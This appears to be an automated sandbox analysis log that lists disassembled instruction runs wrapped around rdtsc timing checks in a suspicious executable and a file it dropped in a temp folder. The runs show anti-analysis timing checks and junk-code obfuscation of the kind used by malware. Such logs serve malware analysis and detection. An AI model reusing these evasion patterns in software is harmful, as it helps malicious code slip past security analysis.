Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B69 second address: 49A0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F60A4BE8BE2h 0x0000000d mov ebp, esp 0x0000000f jmp 00007F60A4BE8BE0h 0x00000014 cmp dword ptr [769B459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F60A4BE8BDDh 0x00000024 sbb esi, 33475FF6h 0x0000002a jmp 00007F60A4BE8BE1h 0x0000002f popfd 0x00000030 call 00007F60A4BE8BE0h 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0BD7 second address: 49A0BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0BDC second address: 49A0C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F60A4BE8BDCh 0x0000000a or ax, 3848h 0x0000000f jmp 00007F60A4BE8BDBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 je 00007F6116B969D4h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F60A4BE8BE4h 0x00000025 jmp 00007F60A4BE8BE5h 0x0000002a popfd 0x0000002b push ecx 0x0000002c mov cx, dx 0x0000002f pop edx 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0C40 second address: 49A0C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0CD5 second address: 49A0D98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F60A4BE8BE8h 0x00000009 jmp 00007F60A4BE8BE5h 0x0000000e popfd 0x0000000f mov cx, 03E7h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F60A4BE8BE3h 0x00000021 adc ecx, 1A98A02Eh 0x00000027 jmp 00007F60A4BE8BE9h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F60A4BE8BE0h 0x00000033 or ch, FFFFFFA8h 0x00000036 jmp 00007F60A4BE8BDBh 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [eax] 0x0000003f jmp 00007F60A4BE8BE9h 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F60A4BE8BDAh 0x00000050 movzx ecx, dx 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0D98 second address: 49A0D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0D9E second address: 49A0DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0DA2 second address: 49A0DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F60A4E98F00h 0x00000010 adc ah, FFFFFF98h 0x00000013 jmp 00007F60A4E98EFBh 0x00000018 popfd 0x00000019 push ecx 0x0000001a call 00007F60A4E98EFFh 0x0000001f pop eax 0x00000020 pop edx 0x00000021 popad 0x00000022 call 00007F6116E4DC89h 0x00000027 push 76952B70h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov eax, dword ptr [esp+10h] 0x00000037 mov dword ptr [esp+10h], ebp 0x0000003b lea ebp, dword ptr [esp+10h] 0x0000003f sub esp, eax 0x00000041 push ebx 0x00000042 push esi 0x00000043 push edi 0x00000044 mov eax, dword ptr [769B4538h] 0x00000049 xor dword ptr [ebp-04h], eax 0x0000004c xor eax, ebp 0x0000004e push eax 0x0000004f mov dword ptr [ebp-18h], esp 0x00000052 push dword ptr [ebp-08h] 0x00000055 mov eax, dword ptr [ebp-04h] 0x00000058 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005f mov dword ptr [ebp-08h], eax 0x00000062 lea eax, dword ptr [ebp-10h] 0x00000065 mov dword ptr fs:[00000000h], eax 0x0000006b ret 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F60A4E98EFEh 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0DF6 second address: 49A0E05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0EAB second address: 49A0EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C03EE second address: 49C03F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C03F4 second address: 49C03F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C03F8 second address: 49C03FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C03FC second address: 49C043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F60A4E98EFAh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov edx, ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F60A4E98EFBh 0x0000001d jmp 00007F60A4E98F08h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C043D second address: 49C044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C044F second address: 49C04C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F60A4E98F07h 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 pushad 0x00000012 jmp 00007F60A4E98F04h 0x00000017 mov dx, ax 0x0000001a popad 0x0000001b test esi, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F60A4E98F09h 0x00000026 or ah, 00000076h 0x00000029 jmp 00007F60A4E98F01h 0x0000002e popfd 0x0000002f mov edi, eax 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C04C2 second address: 49C0507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 56FEh 0x00000007 pushfd 0x00000008 jmp 00007F60A4BE8BDFh 0x0000000d adc al, FFFFFFAEh 0x00000010 jmp 00007F60A4BE8BE9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 je 00007F6116B76A94h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ah, bh 0x00000024 mov ebx, esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0507 second address: 49C0527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0527 second address: 49C0560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6116B8EB32h 0x0000000f jmp 00007F60A4BE8BE0h 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F60A4BE8BDAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0560 second address: 49C0564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0564 second address: 49C056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C056A second address: 49C0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60A4E98EFCh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F60A4E98F03h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0596 second address: 49C059C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C059C second address: 49C05A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C05A2 second address: 49C05A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C05A6 second address: 49C05E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007F60A4E98EFDh 0x00000014 or eax, 0E107AC6h 0x0000001a jmp 00007F60A4E98F01h 0x0000001f popfd 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 pop esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0646 second address: 49C067D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F60A4BE8BDEh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F60A4BE8BDAh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C067D second address: 49C0681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0681 second address: 49C0687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0687 second address: 49C068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C068D second address: 49C0691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0691 second address: 49C0695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FBE0C second address: 6FBE1A instructions: 0x00000000 rdtsc 0x00000002 je 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FBE1A second address: 6FBE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FBE1E second address: 6FBE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70CBF3 second address: 70CC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F60A4E98EF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70CE9D second address: 70CECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F60A4BE8BE5h 0x0000000b jl 00007F60A4BE8BD6h 0x00000011 popad 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F60A4BE8BDBh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70D414 second address: 70D41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70D41B second address: 70D420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70D420 second address: 70D43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F04h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70EF6A second address: 70EF6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70EF6E second address: 70EF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70EF74 second address: 70EF79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70EF79 second address: 70EF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60A4E98EFFh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F038 second address: 70F03F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F03F second address: 70F045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F045 second address: 70F049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F049 second address: 70F07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F60A4E98F01h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F60A4E98F05h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F07E second address: 70F088 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F60A4BE8BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F088 second address: 70F095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F095 second address: 70F099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F099 second address: 70F09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F09D second address: 70F144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60A4BE8BDAh 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F60A4BE8BE2h 0x00000015 pop eax 0x00000016 pushad 0x00000017 jng 00007F60A4BE8BD8h 0x0000001d mov edx, ebx 0x0000001f and edx, 04A4517Bh 0x00000025 popad 0x00000026 push 00000003h 0x00000028 mov edx, 26BED800h 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 mov esi, edi 0x00000032 call 00007F60A4BE8BE7h 0x00000037 push edi 0x00000038 pop esi 0x00000039 pop ebx 0x0000003a popad 0x0000003b push 00000003h 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F60A4BE8BD8h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 jmp 00007F60A4BE8BE4h 0x0000005c or dword ptr [ebp+122D22F4h], eax 0x00000062 push 7D23B3A1h 0x00000067 push eax 0x00000068 push edx 0x00000069 jng 00007F60A4BE8BD8h 0x0000006f rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F144 second address: 70F149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F149 second address: 70F18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 42DC4C5Fh 0x00000010 and esi, 4CE17B4Bh 0x00000016 lea ebx, dword ptr [ebp+12444E66h] 0x0000001c call 00007F60A4BE8BE9h 0x00000021 adc cx, 3208h 0x00000026 pop edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jl 00007F60A4BE8BDCh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F226 second address: 70F29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 add dword ptr [esp], 067178B3h 0x0000000d sbb dh, 00000012h 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F60A4E98EF8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c or dword ptr [ebp+122D2401h], ecx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D2401h], ebx 0x0000003a push 00000003h 0x0000003c mov edi, dword ptr [ebp+122D2B9Ch] 0x00000042 push AD317768h 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F60A4E98F00h 0x0000004f jmp 00007F60A4E98F05h 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F29F second address: 70F2EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60A4BE8BD8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 12CE8898h 0x00000013 mov dword ptr [ebp+122D23D6h], ebx 0x00000019 lea ebx, dword ptr [ebp+12444E6Fh] 0x0000001f clc 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F60A4BE8BE1h 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 ja 00007F60A4BE8BD6h 0x0000002f jmp 00007F60A4BE8BDCh 0x00000034 popad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F2EA second address: 70F2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F3C1 second address: 70F3D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F60A4BE8BDDh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F3D6 second address: 70F461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 73F8F1EEh 0x00000011 stc 0x00000012 xor dword ptr [ebp+122D38DAh], edx 0x00000018 push 00000003h 0x0000001a mov dword ptr [ebp+122D3093h], edx 0x00000020 mov edi, eax 0x00000022 push 00000000h 0x00000024 mov ch, 40h 0x00000026 push 00000003h 0x00000028 push 51D3848Ah 0x0000002d jmp 00007F60A4E98F06h 0x00000032 add dword ptr [esp], 6E2C7B76h 0x00000039 jmp 00007F60A4E98F07h 0x0000003e lea ebx, dword ptr [ebp+12444E7Ah] 0x00000044 mov dx, 3A0Eh 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F60A4E98F03h 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F461 second address: 70F467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F467 second address: 70F46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F46D second address: 70F483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F60A4BE8BDAh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F415 second address: 72F425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F5BA second address: 72F5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9CD second address: 72F9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9D7 second address: 72F9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9DF second address: 72F9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F60A4E98EFCh 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9F8 second address: 72F9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9FC second address: 72FA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jp 00007F60A4E98F00h 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
